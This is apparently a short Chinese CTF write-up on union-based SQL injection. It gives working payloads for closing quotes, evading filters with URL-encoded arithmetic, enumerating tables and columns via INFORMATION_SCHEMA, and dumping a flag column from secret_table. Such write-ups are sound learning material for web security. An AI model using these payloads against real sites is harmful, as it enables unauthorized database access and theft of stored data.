1.发现注入点
2.报数据库
先用单引号(也尝试双引号)闭合前面的语句,使注入的语句能够执行,
数字 0 :匹配字段,还有 1=1 1=2 等等都可以使用,有些网站会有过滤处理,建议采用 1%2b1=2 1%2b1>1 绕过过滤
句尾加 # 井号注释后面的语句和原有的引号括号
使用union select 联合查询显示位,返回的数字即为显示位,可以用来显示字段
' and 0 union select 1,2,3 #
在显示位输入可能的表名,union select语句从数据库 INFORMATION_SCHEMA查询他的columns
' and 0 union select 1,TABLE_SCHEMA,TABLE_NAME from INFORMATION_SCHEMA.COLUMNS #
在表名中寻找可能的表,继续用union select 查询表中的column,即本语句中的列名column_name和数据类型data_type
' and 0 union select 1,column_name,data_type from information_schema.columns where table_name='secret_table'# 得到 secret_table
发现列名有 secret table,继续使用语句查询该列名下
' and 0 union select 1,2,fl4g from secret_table #
出现flag
强行总结:一般sql注入要先用引号括号等出现报错判断sql注入点
用单引号双引号括号闭合前面,用#或 --注释后面的语句和引号括号
order by
union select 1,2,3,4,5,查询显示位
根据mysql常用的表结构查询表和列
参考mysql常用结构: https://blog.csdn.net/Wu000999/article/details/88996768?utm_medium=distribute.pc_relevant.none-task-blog-BlogCommendFromMachineLearnPai2-3.channel_param&depth_1-utm_source=distribute.pc_relevant.none-task-blog-BlogCommendFromMachineLearnPai2-3.channel_param
)
 -------WP)